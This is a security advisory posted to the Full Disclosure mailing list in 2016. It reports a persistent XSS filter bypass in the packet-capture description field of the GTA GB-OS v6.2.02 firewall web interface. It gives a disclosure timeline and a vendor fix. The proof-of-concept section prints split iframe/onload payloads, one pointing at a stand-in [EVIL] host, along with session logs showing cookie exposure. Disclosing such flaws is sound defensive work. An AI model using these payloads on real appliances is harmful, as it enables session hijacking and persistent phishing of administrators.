[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] GTA Firewall GB-OS v6.2.02 - Filter Bypass & Persistent Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-02-24 10:40:45
Message-ID: 56CD88AD.7000107 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
GTA Firewall GB-OS v6.2.02 - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1713
Release Date:
=============
2016-02-24
Vulnerability Laboratory ID (VL-ID):
====================================
1713
Common Vulnerability Scoring System:
====================================
3
Product & Service Introduction:
===============================
GB-OS 6.2 presents numerous enhancements and new features for GTA firewall UTM appliances. \
GB-OS updates include new country blocking configuration options, additional report types and \
graphs, threat management and high availability enhancements, certificate management \
additions, IPv6 updates, and abundant web interface upgrades. GB-OS 6.2 also provides 64-bit \
support for GB-2100 and GB-2500. GB-Ware includes both 64-bit and 32-bit support.
Certificate management updates include the addition of pkcs#7 format, CRLs and the ability to \
revoke certificates. High Availability features improved slave and group updating for easier \
failover management utilizing multiple firewalls, and an increased VRID range. Threat \
management updates protect your network and resources with up-to-the minute technology. The \
power of GTA`s Mail Proxy is boosted with support for EHLO and ESIZE commands and the addition \
of a DNS white list. The Web Filtering subscription option includes new refined content \
categories, providing more granular web access control for employees.
Web interface improvements include menu navigation modifications, country flags, updated \
monitoring and activity pages and updated configuration wizards. These modifications and new \
elements aide administrators in configuring and managing GB-OS powered firewalls. \
Configuration verification messages and log messages have also been updated for improved \
firewall administration.
(Copy of the Homepage: http://www.gta.com/firewalls/ss/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation web \
vulnerability in the official GTA Web Firewall appliance - GB OS v6.2.02.
Vulnerability Disclosure Timeline:
==================================
2016-02-04: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security \
GmbH)
2016-02-05: Vendor Notification (GTA Security Team)
2016-02-10: Vendor Response/Feedback (GTA Security Team)
2016-02-11: Vendor Fix/Patch #1 (GTA Developer Team)
2016-02-20: Security Acknowledgements (GTA Security Team)
2016-02-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Global Technology Assiciates Inc
Product: GTA Web Firewall - Web-Application (Appliance) GB-2500, GB-2100, GB-850, GB-300 & \
GB-Ware
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official GTA \
Web Firewall appliance - GB OS v6.2.02. The vulnerability allows a local attackers to inject \
own malicious script codes to the application-side of the affected modules context.
The security vulnerability is located in the `Edit Packet Capture Filter` function of the \
`Monitor - Packet Capture - Monitor - Tools - Packet Capture` module. Remote attackers are \
able to inject script codes to the description input field by adding a new packet capture \
filter in the web firewall interface. The injection point is the `Edit Packet Capture Filter - \
Description Input Field` and the execution point is the `Packet Capture` item listing. The \
attack vector is persistent (application-side) and the request method to inject is POST.
The web firewall interface has an own validation procedure to filter bad inputs. The input \
validation of the description can be bypassed by injection of a splitted char injection. The \
attacker can inject two payloads and the first is filtered, the second bypasses the validation.
The security risk of the application-side validation web vulnerability is estimated as medium \
with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the persistent \
input validation web vulnerability requires a privileged appliance web-application user account \
and low user interaction. Successful exploitation of the vulnerability results in session \
hijacking, persistent phishing attacks, persistent external redirects to malicious source and \
persistent manipulation of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Service(s):
[+] GB OS v6.2.02
Vulnerable Module(s):
[+] Packet Capture - [Monitor - Tools - Packet Capture]
Vulnerable Input(s):
[+] Edit Packet Capture Filter - [Description]
Vulnerable Parameter(s):
[+] description - listtextplain
Affected Module(s):
[+] Packet Capture Item Listing
Proof of Concept (PoC):
=======================
The application-side validation vulnerability and filter bypass can be exploited by local \
attackers with privileged web-application user account and low user interaction. For security \
demonstration or to reproduce the security vulnerability follow the provided information and \
steps below to continue.
PoC: Packet Capture - [Monitor -> Tools -> Packet Capture]
<td id="idRowDesc_3" class="listtextplain">"><iframe src="http://[EVIL]" \
onload="alert(document.cookie)" <="" "=""><iframe src=http://[EVIL] \
onload=alert(document.cookie) <</iframe></td>
...
<tbody><tr class="listth">
<th id="idColAddDel_0" class="listth"><a id="btnAdd_0" href="javascript:addRow(0);" \
title="New"><img src="/images/list/add_16.gif" height="12" width="12"></a></th> <th \
class="listth" style="">Index</th> <th class="listth" style="">Edit</th>
<th class="listth" style="">Interface</th>
<th class="listth" style="">Capture File</th>
<th class="listth" style="">Packets Captured</th>
<th class="listth" style="">Description</th></tr>
<tr class="listtextplain"><td id="idColAddDel_1" class="listtextplain"><a title="New" \
href="javascript:addRow(1);" id="btnAdd_1"><img src="/images/list/add_16.gif" height="12" \
width="12"></a><img src="/images/spacer.gif" width="8"><a title="Delete" \
href="javascript:delRow(1);" id="btnDel_1"><img src="/images/list/del_16.gif" height="12" \
width="12"></a></td><td class="listtextplain">1</td><td class="listtextplain"><input \
name="desc_1" id="desc_1" type="hidden"><input value="EXTERNAL" name="iface_1" id="iface_1" \
type="hidden"><input value="ANY_IP" name="dst_1_obj" id="dst_1_obj" type="hidden"><input \
name="dst_1_ip" id="dst_1_ip" type="hidden"><input value="ANY_SERVICE" name="service_1_obj" \
id="service_1_obj" type="hidden"><input name="service_1_proto" id="service_1_proto" \
type="hidden"><input name="service_1_ports" id="service_1_ports" type="hidden"><input \
value="100" name="maxPkts_1" id="maxPkts_1" type="hidden"><input value="1024" \
name="maxFileSize_1" id="maxFileSize_1" type="hidden"><input value="256" name="pktSize_1" \
id="pktSize_1" type="hidden"><a title="Edit" href="javascript:editRow(1);" id="btnEdit_1"><img \
src="/images/btns/edit1_16.gif" height="12" width="12"></a></td><td id="idRowIface_1" \
class="listtextplain">EXTERNAL</td><td class="listtextplain"><a style="display: none;" \
title="Save" href="javascript:downloadRow(1);" id="btnDL_1"><img src="/images/list/save_16.gif" \
height="12" width="12"></a></td><td id="idRowPktCap_1" class="listtextplain"><div \
id="idRowProgress_1" style="background-image: url("/images/info/prog-gray.gif"); height: 18px; \
width: 300px; float: left;"><div style="background-image: url("/images/info/prog-left.gif"); \
height: 18px; width: 2px; float: left;"></div><div style="background-image: \
url("/images/info/prog-blue.gif"); height: 18px; width: 148px; float: left;"></div><div \
style="background-image: url("/images/info/prog-right.gif"); height: 18px; width: 2px; float: \
right;"></div></div></td><td id="idRowDesc_1" class="listtextplain"></td></tr><tr \
class="listtextplain"><td id="idColAddDel_2" class="listtextplain"><a title="New" \
href="javascript:addRow(2);" id="btnAdd_2"><img src="/images/list/add_16.gif" height="12" \
width="12"></a><img src="/images/spacer.gif" width="8"><a title="Delete" \
href="javascript:delRow(2);" id="btnDel_2"><img src="/images/list/del_16.gif" height="12" \
width="12"></a></td><td class="listtextplain">2</td><td class="listtextplain"><input \
value="asdasd" name="desc_2" id="desc_2" type="hidden"><input value="EXTERNAL" name="iface_2" \
id="iface_2" type="hidden"><input value="ANY_IP" name="dst_2_obj" id="dst_2_obj" \
type="hidden"><input value="" name="dst_2_ip" id="dst_2_ip" type="hidden"><input \
value="ANY_SERVICE" name="service_2_obj" id="service_2_obj" type="hidden"><input value="1" \
name="service_2_proto" id="service_2_proto" type="hidden"><input value="" \
name="service_2_ports" id="service_2_ports" type="hidden"><input value="100"><iframe src=a \
onload=alert("PENTEST") <" name="maxPkts_2" id="maxPkts_2" type="hidden"><input value="1024" \
name="maxFileSize_2" id="maxFileSize_2" type="hidden"><input value="256"><iframe src=a \
onload=alert("PENTEST") <" name="pktSize_2" id="pktSize_2" type="hidden"><a title="Edit" \
href="javascript:editRow(2);" id="btnEdit_2"><img src="/images/btns/edit1_16.gif" height="12" \
width="12"></a></td><td id="idRowIface_2" class="listtextplain">EXTERNAL</td><td \
class="listtextplain"><a style="display: none;" title="Save" href="javascript:downloadRow(2);" \
id="btnDL_2"><img src="/images/list/save_16.gif" height="12" width="12"></a></td><td \
id="idRowPktCap_2" class="listtextplain"><div id="idRowProgress_2" style="background-image: \
url("/images/info/prog-gray.gif"); height: 18px; width: 300px; float: left;"><div \
style="background-image: url("/images/info/prog-left.gif"); height: 18px; width: 2px; float: \
left;"></div><div style="background-image: url("/images/info/prog-blue.gif"); height: 18px; \
width: 148px; float: left;"></div><div style="background-image: \
url("/images/info/prog-right.gif"); height: 18px; width: 2px; float: \
right;"></div></div></td><td id="idRowDesc_2" class="listtextplain">asdasd</td></tr><tr \
class="listtextplain"><td id="idColAddDel_3" class="listtextplain"><a title="New" \
href="javascript:addRow(3);" id="btnAdd_3"><img src="/images/list/add_16.gif" height="12" \
width="12"></a><img src="/images/spacer.gif" width="8"><a title="Delete" \
href="javascript:delRow(3);" id="btnDel_3"><img src="/images/list/del_16.gif" height="12" \
width="12"></a></td><td class="listtextplain">3</td><td class="listtextplain"><input \
value=""><iframe src=a onload=alert(document.cookie) < "><iframe src=a \
onload=alert(document.cookie) <" name="desc_3" id="desc_3" type="hidden"><input \
value="EXTERNAL" name="iface_3" id="iface_3" type="hidden"><input value="ANY_IP" \
name="dst_3_obj" id="dst_3_obj" type="hidden"><input value="" name="dst_3_ip" id="dst_3_ip" \
type="hidden"><input value="ANY_SERVICE" name="service_3_obj" id="service_3_obj" \
type="hidden"><input value="1" name="service_3_proto" id="service_3_proto" type="hidden"><input \
value="" name="service_3_ports" id="service_3_ports" type="hidden"><input value="100" \
name="maxPkts_3" id="maxPkts_3" type="hidden"><input value="1024" name="maxFileSize_3" \
id="maxFileSize_3" type="hidden"><input value="256" name="pktSize_3" id="pktSize_3" \
type="hidden"><a title="Edit" href="javascript:editRow(3);" id="btnEdit_3"><img \
src="/images/btns/edit1_16.gif" height="12" width="12"></a></td><td id="idRowIface_3" \
class="listtextplain">EXTERNAL</td><td class="listtextplain"><a style="display: none;" \
title="Save" href="javascript:downloadRow(3);" id="btnDL_3"><img src="/images/list/save_16.gif" \
height="12" width="12"></a></td><td id="idRowPktCap_3" class="listtextplain"><div \
id="idRowProgress_3" style="background-image: url("/images/info/prog-gray.gif"); height: 18px; \
width: 300px; float: left;"><div style="background-image: url("/images/info/prog-left.gif"); \
height: 18px; width: 2px; float: left;"></div><div style="background-image: \
url("/images/info/prog-blue.gif"); height: 18px; width: 148px; float: left;"></div><div \
style="background-image: url("/images/info/prog-right.gif"); height: 18px; width: 2px; float: \
right;"></div></div></td><td id="idRowDesc_3" class="listtextplain">"><iframe src="a" \
onload="alert(document.cookie)" <="" "=""><iframe src=a onload=alert(document.cookie) \
<</iframe></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:7319/alive
Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[-1] Mime \
Type[text/html] Request Header:
Host[localhost:7319]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:7319/menu/navmenu6201_en_6.2.01_sw_i_Live.html]
Cookie[GBPREFS=expert=false; GBMODE=; GBPRODUCT=; GBNOWIZARD=true; hintsHidden=; \
GBMENUFRAME=idSslVpn|idMonitor|; GBMENU+=186|183|176|; GBAUTH=; \
GBFB_AUTH_KEY=90428582497884388874313717111004; dnsopt=; adv179_1=%23%3Fadv_view%3Dtrue] \
Connection[keep-alive] Content-Length[0]
Response Header:
Server[unknown]
Content-Type[text/html; charset=utf-8]
Connection[Keep-Alive]
Date[2016-02-05 04:29:56 EST (-0500)]
Expires[2016-02-05 04:29:56 EST (-0500)]
Cache-Control[no-cache, no-store, must-revalidate]
Set-Cookie[GBPREFS=expert=false; HttpOnly; path=/;
GBNOWIZARD=true; path=/;
GBMODE=; path=/;
GBPRODUCT=; path=/;
GBAUTH=; path=/;]
Transfer-Encoding[chunked]
-
Status: 200[OK]
GET http://localhost:7319/monitor/a[PERSISTENT INJECTED SCRIPT CODE EXECUTION!]
Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime \
Type[application/x-unknown-content-type] Request Header:
Host[localhost:7319]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:7319/monitor/pktCapture6201.html]
Cookie[GBPREFS=expert=false; GBMODE=; GBPRODUCT=; GBNOWIZARD=true; hintsHidden=; \
GBMENUFRAME=idSslVpn|idMonitor|; GBMENU+=186|183|176|; GBAUTH=; \
GBFB_AUTH_KEY=90428582497884388874313717111004; dnsopt=; adv179_1=%23%3Fadv_view%3Dtrue] \
Connection[keep-alive] Response Header:
Server[unknown]
Connection[close]
Date[2016-02-05 04:30:20 EST (-0500)]
-
Status: 200[OK]
GET http://localhost:7319/monitor/a[PERSISTENT INJECTED SCRIPT CODE EXECUTION!]
Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime \
Type[application/x-unknown-content-type] Request Header:
Host[localhost:7319]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://localhost:7319/monitor/pktCapture6201.html]
Cookie[GBPREFS=expert=false; GBMODE=; GBPRODUCT=; GBNOWIZARD=true; hintsHidden=; \
GBMENUFRAME=idSslVpn|idMonitor|; GBMENU+=186|183|176|; GBAUTH=; \
GBFB_AUTH_KEY=90428582497884388874313717111004; dnsopt=; adv179_1=%23%3Fadv_view%3Dtrue] \
Connection[keep-alive] Response Header:
Server[unknown]
Connection[close]
Date[2016-02-05 04:30:39 EST (-0500)]
-
ALERT: GBMODE=; GBPRODUCT=; GBNOWIZARD=true; hintsHidden=; GBMENUFRAME=idSslVpn|idMonitor|; \
GBMENU+=186|183|176|; GBAUTH=; GBFB_AUTH_KEY=90428582497884388874313717111004; dnsopt=; \
adv179_1=%23%3Fadv_view%3Dtrue
Reference(s):
http://localhost:7319/menu/
http://localhost:7319/alive/
http://localhost:7319/monitor/
Solution - Fix & Patch:
=======================
The security vulnerability in the web firewall can be patched by a secure encode and parse of \
the vulnerable description input field context with the `description - listtextplain` \
parameter. Restrict the input, disallow special chars and escape the context to prevent \
persistent script code injection attacks. Encode also the description output in the listing to \
patch the execution point of the bug.
Information: The GTA developer team patched the vulnerability in version 6.2.03 with \
cooperation of the internal security team.
Security Risk:
==============
The security risk of the application-side input validation web vulnerability and filter bypass \
issue in the web firewall are estimated as medium. (CVSS 3.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic